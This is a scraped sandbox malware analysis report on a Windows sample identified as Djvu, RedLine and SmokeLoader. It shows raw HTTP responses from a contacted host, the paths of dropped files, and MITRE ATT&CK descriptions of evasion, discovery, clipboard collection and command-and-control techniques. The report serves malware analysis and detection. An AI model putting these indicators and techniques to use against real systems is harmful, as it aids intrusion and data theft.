53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9mT70NdXjnFVYbDGiWKoYAvHVqm3cQYT48fLG6X8Ock5ML5BUUeBtUhxIcO4HdX%2BdqDpJuQgc9VRZqSxm7hLShTLeGbUo1oEgiEOx5R4pwhSR4k3uAQ%2BnwuuV86kkV3r"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa2a0dc119b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Djvu

Threatname: RedLine

Threatname: SmokeLoader

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\43D0.exe

C:\Users\user\AppData\Local\Temp\4434343.dll

C:\Users\user\AppData\Local\Temp\C4AA.exe

C:\Users\user\AppData\Local\Temp\C676.exe

C:\Users\user\AppData\Roaming\beirutt

C:\Users\user\AppData\Roaming\beirutt:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
file.exe

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre